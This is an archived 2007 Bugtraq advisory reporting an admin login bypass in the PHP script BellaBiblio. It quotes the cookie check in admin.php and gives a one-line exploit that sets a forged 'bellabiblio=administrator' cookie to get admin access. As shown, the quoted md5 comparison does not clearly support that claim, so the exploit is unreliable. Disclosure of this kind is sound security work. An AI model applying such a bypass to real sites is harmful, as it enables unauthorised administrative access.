| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070730192958.5047.qmail@securityfocus.com>
Date: 30 Jul 2007 19:29:58 -0000
From: ilkerkandemir@...et.com
To: bugtraq@...urityfocus.com
Subject: BellaBiblio Admin Login Bypass
BellaBiblio Admin Login Bypass
SCRIPT: BellaBiblio
DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip
AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>
Bug in;(admin.php)
if (isset($_COOKIE['bellabiblio'])) {
if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = "";
EXPLOIT:
Set your cookie: bellabiblio=administrator http:/site.com/admin.php
And you have full admin access